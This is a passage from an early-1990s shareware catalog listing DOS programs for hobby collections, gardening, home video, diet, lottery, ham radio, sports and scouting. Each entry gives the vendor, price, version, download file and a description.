recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: ART527.ZIP on BBSs. + Download size: 300k + Description: + A specialized cataloging system designed specifically for art + collections including - paintings, sculpture, prints, weavings, + castings, etc. Each piece can be cataloged by up to 21 + characteristics all of which can be searched, sorted, cross + referenced or alphabetized. Great for insurance purposes! A + single ATL-key combination displays both the total cost and + total current value. Published by HomeCraft, the leader in + software for cataloging collectibles. + + Chapter 15, "Home & hobby" 324 + + + + Product: ORGANIZE! Your Books/Magazines [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: BOOKS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed specifically for cataloging + books and magazines. Provides up to 21 fields, all of which + can be cross referenced, searched, alphabetized and sorted. + User definable reports all you to print anything from index + cards to full page reports. The 10,000,000 entry capacity + provides room for even the largest collection. + + "...a very complete program designed to meet the needs of the + most demanding book collector." - Journal of the National Book + Collector's Society. + + Product: ORGANIZE! Your CDs & Records [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: POP527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging CDs, LPs, cassettes, + tapes and music videos. It allows you to catalog your music + collection based on up to 21 criteria - all of which can be + searched, cross referenced and alpabetized. The 10,000,000 + entry capacity provides room for the largest collection. Rated + as the best available software for cataloging CD/LP collections + by both Goldmine and DISCoveries magazines. + + Product: ORGANIZE! Your Coin Collection [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, newsletter + support, updates, bonus utilities. + Look for: COINS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging coins from any country. + 3-D drop down menus and WYSIWYG screens make this software + straight forward and simple to use. Catalog each coin by up to + 21 criteria - all of which may be searched, alphabetized or + + Chapter 15, "Home & hobby" 325 + + + + cross referenced. A 10,000,000 coin capacity allows this + software to handle any size collection. + + A repeat key and macros make entering information about your + collection quick and easy. User definable reports allow you to + print your reports the way you want. + + Product: ORGANIZE! Your Comic Books [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + support, bonus utilities. + Look for: COMIC527.ZIP on BBSs. + Download size: 300k + Description: + This software provides a fast and easy way to catalog a comic + book collection of any size. Repeat keys and macros make + entering information about your collection easy. You can use + up to 21 lines to catalog your collection - all of which can be + searched, cross referenced and alphabetized. 3-D drop down + menus provide quick access to all program features. User + definable reports let you print anything from index cards to + full page reports. + + Product: ORGANIZE! Your Fabrics [***] + Specialized cataloging system for fabrics. See full + description on page 352. + + Product: ORGANIZE! Your Guns [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: GUNS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed for both casual and licensed + gun collectors. Allows you to catalog up to 21 characteristics + for each gun. Great for insurance purposes! + + User definable reports allow you to have reports printed _your_ + way. 3-D drop down menus put all of the features at your + finger tips. Catalog, search and list your collection based on + gun type, caliper, year manufactured or any other way you wish. + This is the most flexible and complete software for cataloging + a gun collection. + + Chapter 15, "Home & hobby" 326 + + + + Product: ORGANIZE! Your Model Railroad [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-31-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: RAIL527.ZIP on BBSs. + Download size: 300k + Description: + Designed for both the collector and modeler this software helps + the model railroad enthusiast get organized. You can use up to + 21 lines to catalog your collection/model railroad. All of the + lines can be searched, cross referenced, sorted or + alphabetized. A single ALT-key combination quickly gives you + the total cost and the total current value of your collection/ + model railroad. Great for insurance purposes! Published by + HomeCraft, the leader in cataloging software. + + Product: ORGANIZE! Your Plants/Garden [***] + Specialized cataloging system for plants. See full description + on page 328. + + Product: ORGANIZE! Your Sports Cards [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, >1.5MB of Topps cards data, + updates, bonus utilities. + Look for: CARDS527.ZIP on BBSs. + Download size: 300k + Description: + Specialized database for cataloging baseball, football, hockey + and all other types of sports cards. Allows you to keep track + of what you have, what you want and what you have available for + trade or sale. Great for insurance purposes! + + Fast index based searches and sorting allows you to quickly + list your collection (or want list) or find the card you want. + Searches will list all cards over a set value or all rookie + cards. User definable reports let you get your printed reports + the way _you_ want. + + Chapter 15, "Home & hobby" 327 + + + + Product: ORGANIZE! Your Stamp Collection [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + newsletter support, bonus utilities. + Look for: STAMP527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging stamps from any/all + countries. Repeat keys and macros make entering information + about similar stamps quick and easy. A 10,000,000 stamp + capacity provides room for the largest collection. Each stamp + can be cataloged using up to 21 criteria (16 of which are user + definable) - all of which can be searched, cross referenced, + alphabetized and sorted. User definable printed reports allow + you to print anything from index cards to full page reports. + + Product: SoundZ [***] + Needs: IBM PC, DOS 2.1 or better. Graphics or LaserJet printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $45.00 + Version: 2.20 (02-14-92) + User benefits: Printed manual, latest version, ZideCar add on + utility at no charge, phone/BBS/mail support, lifetime free + upgrades. Product discounts. Shareware disks of other + programs. + Look for: SOUNDZ22.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SOUNDZ.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 252k + Description: + The program was designed for audiophiles who have multiple + formats for their collections (Cassettes, CDs, 45s, 78s, LPs, + and Reel To Reels). It is more in depth than ANY of the other + audio program. So, if you need more than a basic catalog SoundZ + is the program for you! Standard entries for Title, Artist , + Reference Number, Category, Price/Value, Date of Purchase, Date + of Origin, UNLIMITED number of songs per side (with notes + entries for each!), and a text Liner NoteZ field of up to 5000 + lines. + + Product: VIDEO BUFF + Video Tape Organizer. See full description on page 330. + + Product: VIDEOCAT + Catalogs videocassette collections. See full description on + page 331. + + Product: VideoMaster + Helping You *Master Your Video Collection. See full + description on page 332. + + Chapter 15, "Home & hobby" 328 + + + + Product: VINO:FILE Cellar Master + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Hard Disk + Recommended. + Author: Mark Christian, 011-61-3-882-3108 + Registration: $25.00 + Version: 2.15 (10-31-90) + User benefits: Printed manual, master disks, bonus utilities. + Look for: VINO215.ZIP on BBSs (call 617-354-8873 to download it + at no charge); VINOFL.ZIP in WINEFORUM forum LIB 6 on + CompuServe. + Download size: 240k + Description: + Organises your wine cellar! Keep an inventory, track purchases, + locate valuable bottles and enter tasting notes. An easy to use + interface and a neat geographic cross reference saves you from + entering repetitive data. Many searches and printed reports. + + + 15.3 Gardening + + Product: ORGANIZE! Your Plants/Garden [***] + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utiliites. + Look for: PLANT527.ZIP on BBSs. + Download size: 300k + Description: + If you'd like to keep track of the plants you have in your + house, yard or garden then this is the software for you! Not + only can you catalog the plants you have, but for each one you + can record its characteristics such as color, when it blooms, + its growth, etc. Plus you can have any care instructions + immediately available at your finger tips. 3-D drop down menus + and WYSIWYG screens make this software easy to use. Published + by HomeCraft, the leader in cataloging software. + + Chapter 15, "Home & hobby" 329 + + + + 15.4 Household automation + + Product: Smart10 [***] + Needs: IBM PC, DOS 3.3 or better. X10 PowerHouse CP290. + Author: Sympathetic Software + Registration: $20.00 + Version: 1.2 (10-06-91) + User benefits: Free upgrading. + Look for: SMRTEN11.ZIP on BBSs (call 714-730-6743 to download it + at no charge); SMRTEN.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 97k + Description: + Devised to overcome limitations of the CP290 and its software. + It maintains a year's calendar of events. Use Sunrise and + Sunset as times. Events can beconditioned to occur (or not) if + it is Dark (or Light), between dates you have specified, or on + command line parameters. + + Issue direct or delayed commands and cancel pending events. + Automate AUTOEXEC.BAT with CHKTIME (compares the computer's + date- time with target date-times) and DSTIME (adjusts clock + for daylight savings time). + + + 15.5 Movies & video tapes + + Product: Collect! (VGA version) + Intelligent Collection Management Tool. See full description + on page 320. + + Product: DiscTrak System + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: Blam Entertainment Group, 613-831-4064 + Registration: $25.00 + Version: 1.62 (10-08-91) + User benefits: Serial Number, New Version Verification, Free + Upgrades. + Look for: DT-162.ZIP on BBSs. + Download size: 185k + Description: + Home entertainment database capable of tracking LaserDiscs, + Compact Discs, Video Tapes, Cassette Tapes and Record Albums. + Limited only by the size of your disk drive space. This + program will track anything you could possibly imagine and + more. Easy to use, menu driven. Fully configurable printer + support. Search for a specific song, star, director, or title. + Compact discs can include up to 99 songs per disc. Includes + interface for archive support. + + Chapter 15, "Home & hobby" 330 + + + + Product: Movie Guide + Needs: IBM PC, DOS 2.1 or better. 384k RAM, hard disk. + Author: SANDD Software, 703-444-8655 + Registration: $30.00 + Version: 3.0 (07-15-91) + User benefits: Phone and mail support. Notification of + enhancements and other products. + Look for: availability unknown on BBSs; MOVIEA.ZIP in IBMAPP + forum LIB 7 (multiple files) on CompuServe. + Download size: 500k + Description: + I now have a camcorder, recorded movies, TV shows and training + films, how can I keep track of all this information? Remember, + it must be FUN and POWERFUL. Movie Guide can help. It will + catalog your movies, show pictures, and play music. + Automatically tracks film history of the stars and directors, + and of course show any pictures or songs associated with them. + If you just want to track multimedia files, then select + 'Multimedia Search' and you're done. + + Product: ORGANIZE! Your Video Tapes [***] + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, upgrades, + newsletter support, bonus utilities. + Look for: VIDEO527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed specifically for cataloging + video tapes (movies, TV shows & personal videos). Each + selection on a tape can be cataloged using up to 21 criteria - + all of which can be searched, cross referenced, sorted and + alphabetized. 3-D drop down menus and WYSIWYG screens make + this software straight forward and simple. + + User definable reports let you print anything from index cards + to full page reports. Published by HomeCraft, the leader is + software for cataloging collections. + + Product: Peronal Record Keeper + Storage of personal and family information. See full + description on page 353. + + Chapter 15, "Home & hobby" 331 + + + + Product: VIDEO BUFF + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Version: 1.33 (01-01-92) + User benefits: 1 yr. Tech Support. + Look for: VDBUF133.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 198k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use menu driven video tape organizer. Keep track of + your entire video collection. Unique features all the user to + find subjects, stars, costars quickly. Multiple recordings per + tape with tape position and recording. Several printer outputs + allows the user to print complete list of all video tapes, + individual video tapes. Print labels for tapes. Database Backup + is featured. 10 user defined fields. + + Product: Video Librarian + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Version: 3.5s (02-10-92) + User benefits: Printed Manual, Latest Version, Technical Support, + Product Discounts. + Look for: VLB.ZIP on BBSs; VLB.EXE in IBMAPP forum LIB 7 on + CompuServe; VLB35.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 159k + Description: + Full featured menu-driven database manager that catalogs video + libraries like no other. 14 database management functions + available from data entry screen. Holds 18 fields of + information about each title. Has very fast search and find + routines. Prints reports to the screen, printer or disk. Prints + labels on regular or custom labels for cassettes. Mouse + support, context sensitive help, moveable, re-sizeable browse/ + find screens. Memo field for movie synopsis. Can hold 2 billion + titles. + + Chapter 15, "Home & hobby" 332 + + + + Product: VIDEOCAT + Needs: IBM PC, DOS 2.1 or better. Includes programs for Windows + & OS/2 as well. + Author: William A. Jackson + Registration: $20.00 + Version: 7.2 (07-28-91) + User benefits: Next update is free. C source code available on + request. + Look for: VCAT72.ZIP on BBSs (call 714-856-7996 to download it at + no charge); VCAT72.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 140k + Description: + Fully featured text-based program for cataloging videocassette + collections; designed for serious collectors and large + collections. Add, change, delete records, print labels and + listings, statistical reports. Classification categories can + be custom configured by user; record includes free-form text + comment field. Family API runs under DOS or OS/2. A Windows + compatible program is also included. May conflict with some + shells, popups and other TSRs. + + Product: VideoMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 7.50 (07-04-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: VIDM750.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM75.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 129k + Description: + To help User catalog their video tapes and assist User in + printing catalogs, standard and User customized listings and + labels for the spine and front of the tape. There are entries + for Tape Number, Title, Rating, Start Point, Star, Co Star, + three User defined entries and a seven line Synopsis as well as + Category. User can find any tape by any field or combination. + The program can handle up to multiple titles on a single tape, + file only being limited by disk space. Great for the home + video buff! + + + 15.6 Personalities + + Product: By the Numbers [***] + Personality analysis with Numerology. See full description on + page 348. + + Chapter 15, "Home & hobby" 333 + + + + Product: WordZ + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 2.00 (07-31-91) + User benefits: Master disks, phone/mail support. Shareware disks + of other programs. + Look for: WORDZ200.ZIP on BBSs (call 317-784-2147 to download it + at no charge); WORDZ.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 150k + Description: + Ever wanted to keep track of jokes, stories, family history or + whatever and wanted an easy way to do it? WordZ to the rescue. + You can build up to 10 different chapters a page ata time. Even + has KeyWordZ to quick reference each page! All chapters have + seperate defaults for colour, drive, file name, and title. Each + chapter is also capable of having its own PassCode and + encryption! All profits from this program are being donated to + the American Cancer Society. + + + 15.7 Health + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 202. + + 15.7.1 Food/dietary/kitchen + + Product: The Better Diet Analyzer + Needs: IBM PC, DOS 2.0 or better. 384k RAM. + Author: Syntonic Software, 704-542-0473 + Registration: $29.95 + Version: 3.1 (01-11-92) + User benefits: Printed manual, master disks, one year phone/CIS/ + mail support, upgrade discounts. + Look for: BDA*.ZIP (multiple files) on BBSs (call 212-431-1194 to + download it at no charge); BDA*.ZIP in IBMAPP forum LIB 7 + (multiple files) on CompuServe; BDA*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 308k + Description: + Over 1,400 food records, including brand names and fast food + restaurants. Features a Database Editor plus a Recipe Builder + to add foods and recipes to the database. Tracks calories, + cholesterol, protein, carbohydrates, fat, sodium, alcohol and + your weight. Gives an instant report on percent of calories + from protein, carbohydrates and fat. Excellent for lowering + your cholesterol or "carbo loading" for sports events. Manual + includes diet, cholesterol and carbo loading guidelines. + + Chapter 15, "Home & hobby" 334 + + + + Product: Master Meal Manager [***] + Needs: IBM PC, DOS 2.0 or better. 640k RAM. + Author: Thomas C. Johnson, 513-878-9174 + Registration: $25.00 + Version: 1.51 (01-09-92) + User benefits: Printed manual, master disks, six months support. + Look for: availability unknown on BBSs. + Download size: 160k + Description: + A masterful combination of user friendliness and common sense + functions making the common kitchen management chores (recipes, + meal planning, and shopping) a breeze. All three are integrated + so that your recipes are used to generate a meal schedule for + up to 14 days worth of meals. The meal schedule and recipes are + then used to generate your shopping list. Easy to learn. Easy + to use. + + Product: OMNIMeal + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 3.03 (09-01-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: OMEAL303.ZIP on BBSs (call 317-784-2147 to download it + at no charge); OMEAL.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 150k + Description: + All the standard features of Recipe programs PLUS: MulipleXer: + Allows User to increase/decrease the number of people served by + a particular recipe, and changes all of the required + ingredients automatically; OMNIFind!: Allows User to do + extensive searches of the data file; The choice of printing + lists, catalogs, two 1-sided, or one 2-sided 3X5 card for each + recipe. OMNIShop: Shopping list for the recipes chosen that + lists not only the ingredients but combines like ingredients + for ease of use. + + Chapter 15, "Home & hobby" 335 + + + + Product: Smart Home Shopper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $20.00 + Version: 1.2 (06-07-91) + User benefits: Receive latest version and copy of another + program- Support BBS. + Look for: TDS BBS on BBSs (call 804-488-5506 to download it at no + charge); SHS12.ZIP in IBMAPP forum LIB 7 on CompuServe; + SHS12.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + Quickly and conveniently prepare a grocery shopping list in + store aisle order. Once a product is entered, it only needs to + be tagged to appear on future lists. Use at several levels of + sophistication. You can actually store price information from + several different stores and let the program do comparison + shopping and prepare multiple shopping lists. Much more. Well + supported by the author. + + Product: VINO:FILE Cellar Master + Wine cellar management system. See full description on + page 327. + + 15.7.2 Exercise/fitness + + Product: Aerosoft Fitness Log + Needs: IBM PC, DOS 2.0 or better. + Author: Aerosoft, 317-849-7659 + Registration: $49.00 + Version: 2.3 (10-15-91) + User benefits: 40 pg user manual. Presidential Sports Award + poster and brochure. Mailing labels and Exercise Test + utilities. + Look for: availability unknown on BBSs. + Download size: 250k + Description: + * Records all 49 exercises featured in the Presidential + Sports Award program and directs you in mailing for your + Award. + * Calculates aerobic points and calories burned. + * Compares on a monthly basis current year aerobic point + totals and cardiovascular fitness levels with the previous + year. + * Tracks 999 users per log. Optionally requires passwords. + * Prints: Detail and Summary Exercise History; Presidential + Sports Awards; User IDs. + + Chapter 15, "Home & hobby" 336 + + + + 15.8 Lottery + + Product: Lotto Challenger + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Data Solutions, 800-783-8934 + Registration: $29.50 + Version: 3.6 (01-01-91) + User benefits: Most recent version, voice/CIS/newsletter support, + free lottery data file, discount on other lottery products. + Look for: LC36.ZIP on BBSs (call 414-789-4210 to download it at + no charge); LC36.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 135k + Description: + Uses a statistical analysis of previous drawings to pick lotto + numbers to play. The program includes 20 number systems that + generate tickets from the numbers picked. The program compares + the tickets to the numbers drawn, and determines winning + tickets. A history option allows testing of playing strategies + on previous drawings. Lotto Challenger is completely menu + driven and very user friendly. Supports keyboard or mouse + input. Compatible with all Pick 5 or Pick 6 lotteries. + + Product: LOTTO PROPHET + Needs: IBM PC, DOS 2.1 or better. Hard disk recommended. + Author: DataMicro, Inc, 813-629-7720 + Registration: $15.00 + Version: 3.01 (06-01-91) + User benefits: Latest version, Upgrade opportunities, Tech + support, Reg.# replaces the 'Unregistered' Comments. + Look for: PROPHET3.ZIP on BBSs (call 813-624-6129 to download it + at no charge); PROP30.EXE in IBMNEW forum LIB 9 on CompuServe; + PROPHET3.ZIP in IBM RTC LIB 7 on GEnie. + Download size: 180k + Description: + A lottery science statistical compiler - evaluator - the most + complete lottery software on the the market today. Can hold 60 + lotteries. Update & Edit. Statistical reports:Frequently drawn + numbers, HOT numbers, Numbers appearing with other numbers, + numbers appearing in a certain month, Power/Due rating, Numbers + likely to follow the last draw. Doubles & Triples Reports. + Prints reports, graphs, charts, prophet cards. Stores player's + numbers and checks for winners. + + Chapter 15, "Home & hobby" 337 + + + + Product: The LOTTO SIMULATOR + Needs: IBM PC, DOS 2.1 or better. + Author: Brentson Worrell, 813-886-2282 + Registration: $20.00 + Version: 1.0 (08-20-91) + User benefits: Latest version disk, extra lotto statistic, bypass + Shareware screen, tech support by phone or mail, future + upgrades for low price. + Look for: LOTSIM10.ZIP on BBSs; LOTSIM.ZIP in IBMAPP forum LIB 7 + on CompuServe; LOTSIM10.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 36k + Description: + Uses a different approach to winning the lottery. It's not a + wheeling or database style program. Instead it takes your picks + and compares them to thousands of random lottery drawings, + similar to actual lotto games. Almost instantly you can see + how your picks stand up against the odds. Various statistics + are recorded, and displayed or printed. Whether you use your + own numbers or let the computer choose them for you, Lotto + Simulator is fast, informative, and FUN! + + Product: Lotto Thunder + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk. + Author: Charles P.Staats + Registration: $20.00 + Version: 1.00 (10-21-91) + User benefits: Printed Manual with disk, Newletter support, New + versions before offical release. + Look for: LOTTOT.ZIP on BBSs; LOTTOT.ZIP in IBMNEW forum LIB 9 on + CompuServe. + Download size: 413k + Description: + Would you like to play all the numbers in your PICK-6 lotto? + Try this complete Lotto Prediction and Number systems program. + It has three completely different methods of predicting lotto + numbers. Wheel systems up to 54 numbers, Multiple Level + Predictions, Save Predictions, Scan for Winners, Scan for Past + Performance, Auto and Manual execution of prediction methods, + No Game limit. + + Chapter 15, "Home & hobby" 338 + + + + 15.9 Ham radio + + Product: LAN-LINK + Needs: IBM PC, DOS 2.0 or better. Radio transceiver and TNC. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $35.00 + Version: 1.59 (04-01-91) + User benefits: Electronic, telephone and mail support. Free + upgrades. + Look for: LL159EXE.ZIP on BBSs (call 301-593 9067 to download it + at no charge). + Download size: 320k + Description: + A Personal Packet Terminal Program for the TNC1, TNC2, KPC-2 + and most of all a smart multimode digital communications + controller for the KAM, MFJ1278 and the PK-232. Menu driven, + optimizes the configuration of the TNC in each communications + mode and provides smart terminal features. If you are not using + LAN-LINK, you are not making the most use of the LAN. + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 249. + + Product: PC-HAM + Needs: IBM PC, DOS 2.0 or better. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $36.50 + Version: 5.52 (03-20-91) + User benefits: update, dBASE source code to logging package, and + support. + Look for: LOG3_52.EXE on BBSs (call 301-593 9067 to download it + at no charge). + Download size: 150k + Description: + More than a simple menu driven computerized logbook, it allows + you to access the data in the logbook in ways that have not + been previously possible. For example:- Generate your DXCC + status automatically. + + A contest logging package, sweepstakes simulation game and + propagation prediction programs are also included in the + package. + + Product: PC-TRACK [***] + Satellite Tracking Package. See full description on page 318. + + Product: PCCLOCK + Digital clock plus timesetting by modem. See full description + on page 81. + + Chapter 15, "Home & hobby" 339 + + + + Product: WHATS-UP + Needs: IBM PC, DOS 2.0 or better. Radio receiver and Radio + Modem. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $35.00 + Version: 1.00 (04-01-91) + User benefits: upgrades, support (elcetronic, telephone and + mail). Data exchange. + Look for: PC HAM on BBSs (call 301-593 9067 to download it at no + charge). + Download size: 202k + Description: + A tool which provides the Radio Amateur, or the Educator, with + the capability to perform experiments in spacecraft orbital + dynamics as well as monitoring the environment onboard several + of the Orbiting Satellites Carrying Amateur Radio (OSCAR) + during individual passes or over long periods of time. Provides + an introduction as to how this can be done using readily + available low cost equipment (under $500.00). + + + 15.10 Sports + + Product: 3 ball Juggler + Juggling tutor and arcade-game like simulator. See full + description on page 373. + + Product: FISHBYTE(tm) [***] + Needs: IBM PC, DOS 3.3 or better. Hard disk, CGA monitor. + Author: EJM Computer Consulting Ltd., 516-483-7561 + Registration: $29.95 + Version: 1.2 (01-07-92) + User benefits: Printed manual, master disks, phone support. + Look for: FISHBYTE.ZIP on BBSs (call 516-226-3727 to download it + at no charge); FISHBY.ZIP in OUTDOORS forum LIB 5 on + CompuServe. + Download size: 218k + Description: + This integrated fishing and Loran log program is specifically + designed for the salt water angler. This menu driven system + consists of three components. The fishing trip log provides a + fun and easy way to record all the important aspects of a day's + fishing. The Loran log can be used to organize your valuable + collection of Loran coordinates. The Utilities area includes a + moon phase display, a "Personal Best" search, and "Techniques" + where notes on various methods can be stored. + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 202. + + Product: ORGANIZE! Your Guns [***] + Cataloging systems for guns. See full description on page 325. + + Chapter 15, "Home & hobby" 340 + + + + Product: ORGANIZE! Your Sports Cards [***] + Cataloging system for sports cards. See full description on + page 326. + + Product: Personal Golf Tracker + Needs: IBM PC, DOS 2.1 or better. + Author: John L. Hancock + Registration: $15.00 + Version: 2.1 (07-15-91) + User benefits: Latest version, after hours phone support, and a + printed manual for registered users. + Look for: availability unknown on BBSs; PGT21.ZIP in IBMNEW forum + LIB 9 on CompuServe; PGT21.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 120k + Description: + Keeps track of your golf scores and much more. It displays + your personal best on each course you play on a hole by hole + basis, keeps your average scores on par 3's par 4's and par 5's + as well as your averages for each nine and eighteen. Shows the + distribution of your scores to par, bogey, etc. Calculates nine + and eighteen hole handicaps and prints seven summaries of your + performance. Also lets you track of six statistics of your + choosing. Also useful for leagues. + + Product: The Pool Manager + Needs: IBM PC, DOS 2.1 or better. + Author: American Systems + Registration: $25.00 + Version: 2.0 (08-05-90) + User benefits: 1) Current season NFL Schedule on disk 2) + Technical support via mail or Compuserve 3) SQRPOOL utility + program for running playoff pools 4) Latest version of the + program and discounted upgrades. + Look for: availability unknown on BBSs; NFL.EXE in IBMNEW forum + LIB 9 on CompuServe. + Download size: 130k + Description: + Maintains all aspects of running a football pool or a pool for + any sport. 6 different customizable reports including + picksheet, standings, `What If?' scenarios, & everyone's picks. + You can configure the exact pool you want using the following + options: + + 1) Confidence Points or Wins & Losses only + + 2) Use of a custom tiebreaker + + 3) Application of the pointspread + + Keeps season long statistics for a group of up to 120 + participants. An NFL schedule is available, but not required. + Fully menu driven. + + Chapter 15, "Home & hobby" 341 + + + + Product: SOFF BALLS + Needs: IBM PC, DOS 2.1 or better. + Author: Computater Software, 608-271-1586 + Registration: $29.00 + Version: 3.2 (11-28-91) + User benefits: Will receive FREE Version 4.0 ; phone support; + mailed notification when major upgrades become available! + Look for: SB32.ZIP on BBSs (call 608-849-5842 to download it at + no charge); SB32.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 143k + Description: + Softball/Baseball record-keeping system for league or + individual teams. Keeps records for up to 20 teams. Reports + on team records, game scores, batting and pitching statistics, + and team standings. Computes statistics for selected games + (all games, first 7 league games, last 15 tournament games, + games 5 through 9, etc.). Displays and prints reports. Menu- + driven and very easy to use. + + Product: Softball Coach + Needs: IBM PC, DOS 2.1 or better. + Author: The Software Construction Co. + Registration: $25.00 + Version: 3.0 (11-26-90) + User benefits: Update notification, latest version. + Look for: SOFTBALL.ZIP on BBSs (call 508-454-3864 to download it + at no charge); SOFTBA.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 72k + Description: + Manipulate data for your league or team. 17 different + statistics are kept for each player. 9 more for each game + played. Databases can be merged to allow league totals, + lifetime stats, season totals, etc. depending on what info. is + stored in each DB. + + Great for helping generate that batting order or awards for + your team/league banquet! + + A report generation facility allows sorting and filtering + (exclude players below a threshold) by any statistic and can + output to a file, disk, or printer. + + Chapter 15, "Home & hobby" 342 + + + + Product: SwimBase [***] + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Words to Go, 301-855-6427 + Registration: $49.00 + Version: 1.60 (03-01-92) + User benefits: Printed manual, master disks. + Look for: SWIMDB16.ZIP on BBSs; SWIMDB.ZIP in IBMNEW forum LIB 9 + on CompuServe. + Download size: 198k + Description: + An easy to use, menu driven program to keep all the data + required for a swim team. The swimmers' personal data is stored + along with all event, meet and season results. Team rosters, + address lists, swimmer results, event results and meet results + are some of the reports that can be prepared. All event names, + event numbers and event scoring is user-definable. User + selectable age and event groups are available. Supports up to + 511 swimmers per team and 256 events. + + + 15.11 Scouting + + Product: MERIT BADGE TRACKER + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Robert Barrentine, 301-490-7104 + Registration: $35.00 + Version: 2.1 (12-15-91) + User benefits: Mail support, limited phone support. + Look for: MBTRAK.ZIP on BBSs; MBTRAK.ZIP in OUTDOORS forum LIB 2 + on CompuServe. + Download size: 213k + Description: + A menu-driven program which stores a District or Council Merit + Badge Counselor roster and the specific Merit Badgesand/or any + other skills that a specific counselor is registered to + counsel. Program will generate an administrative Counselor + roster, a roster of Merit badges and Counselors (with address + and telephone number)to be distributed to units, and an annual + verification letter to each counselor. + + Chapter 15, "Home & hobby" 343 + + + + Product: PACK TRACKER + Needs: IBM PC, DOS 2.1 or better. + Author: Robert Barrentine, 301-490-7104 + Registration: $35.00 + Version: 1.0 (02-14-92) + User benefits: Mail support, limited phone support. + Look for: availability unknown on BBSs; PAKTRK.ZIP in OUTDOORS + forum LIB 2 on CompuServe. + Download size: 217k + Special instructions: Product distribution restricted to the + United States. + Description: + A menu-driven program which stores roster, advancement,atten- + dance, participation, Pack/Den offices, Activity Badges earned, + 